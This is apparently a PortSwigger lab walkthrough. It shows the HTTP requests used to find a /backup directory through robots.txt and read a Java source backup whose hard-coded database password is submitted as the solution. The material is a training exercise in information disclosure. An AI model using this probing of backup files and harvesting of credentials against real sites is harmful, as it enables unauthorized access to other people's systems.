PortSwigger: Source code disclosure via backup files
Source code disclosure via backup files
Solution
Open website: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/product?productId=1
GET /product?productId=1 HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Open website: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/robots.txt
GET /robots.txt HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Open the /backup folder referenced in robots.txt: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/backup
GET /backup HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
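Read the backup file, which the server returns as plain text: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/backup/ProductTemplate.java.bak
Found password: jvm1m60w3lrsnnywjtgkagumuvtv63sx (hard-coded as the last argument of the ConnectionBuilder.from(...) call in the source below)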
---
GET /backup/ProductTemplate.java.bak HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/backup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
package data.productcatalog;
import common.db.JdbcConnectionBuilder;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
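/**
 * Serializable reference to a catalogue product.
 *
 * <p>Only {@code id} is written to the serialized form; {@code product} is transient and is
 * re-loaded from the database every time an instance is deserialized (see {@link #readObject}).
 *
 * <p>Security notes for reviewers:
 * <ul>
 *   <li>{@code id} is restored from the serialized stream, so it must be treated as untrusted
 *       input whenever the stream can be influenced by a client. It is therefore bound as a
 *       query parameter and never formatted into the SQL text.</li>
 *   <li>The database credentials are embedded in this source file. Anyone who can read the file,
 *       including a stray backup copy left under the web root, obtains them. They should be
 *       loaded from deployment configuration or a secret store, and rotated once exposed.</li>
 * </ul>
 */
public class ProductTemplate implements Serializable
{
    static final long serialVersionUID = 1L;

    // Product identifier; the only field that is part of the serialized form.
    private final String id;

    // Populated by readObject(); stays null when no matching row exists or when the
    // instance was created through the constructor.
    private transient Product product;

    /**
     * Creates a template for the given product id. No database access happens here.
     *
     * @param id product identifier used for the lookup on deserialization
     */
    public ProductTemplate(String id)
    {
        this.id = id;
    }

    /**
     * Custom deserialization hook: restores {@code id} from the stream and then looks the
     * product up in the database.
     *
     * @param inputStream stream the object is being read from
     * @throws IOException if the stream cannot be read or the database lookup fails
     *     (the {@link SQLException} is kept as the cause)
     * @throws ClassNotFoundException if a class in the stream cannot be resolved
     */
    private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException
    {
        inputStream.defaultReadObject();

        // NOTE(review): ConnectionBuilder is not among this file's imports (the file imports
        // common.db.JdbcConnectionBuilder) - presumably resolved elsewhere; confirm.
        // NOTE(review): the positional arguments look like driver, scheme, host, port, database,
        // user and password - verify against ConnectionBuilder.from.
        // SECURITY: hard-coded credential. Move it to configuration / a secret store and rotate it.
        ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
                "org.postgresql.Driver",
                "postgresql",
                "localhost",
                5432,
                "postgres",
                "postgres",
                "jvm1m60w3lrsnnywjtgkagumuvtv63sx"
        ).withAutoCommit();

        // try-with-resources closes the connection, statement and result set on every path;
        // the original left all three open.
        try (Connection connect = connectionBuilder.connect(30);
             PreparedStatement statement =
                     connect.prepareStatement("SELECT * FROM products WHERE id = ? LIMIT 1"))
        {
            // Bind the stream-supplied id as data so it cannot alter the query structure.
            // NOTE(review): the column type of products.id is not visible here; if it is
            // numeric, validate id and bind it with the matching setter instead of setString.
            statement.setString(1, id);

            try (ResultSet resultSet = statement.executeQuery())
            {
                if (resultSet.next())
                {
                    product = Product.from(resultSet);
                }
            }
        }
        catch (SQLException e)
        {
            // Surface database failures through the deserialization contract, keeping the cause.
            throw new IOException(e);
        }
    }

    /**
     * @return the product identifier this template was created or deserialized with
     */
    public String getId()
    {
        return id;
    }

    /**
     * @return the product loaded during deserialization, or {@code null} if none was loaded
     */
    public Product getProduct()
    {
        return product;
    }
}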
Submit solution
POST /submitSolution HTTP/2
Host: 0a7d00c903464aac83523220009a0077.web-security-academy.net
Cookie: session=nXJuvFYWVn7m2ZdprfCvvAldtkXZ142I
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: https://0a7d00c903464aac83523220009a0077.web-security-academy.net
Referer: https://0a7d00c903464aac83523220009a0077.web-security-academy.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
answer=jvm1m60w3lrsnnywjtgkagumuvtv63sx
Solved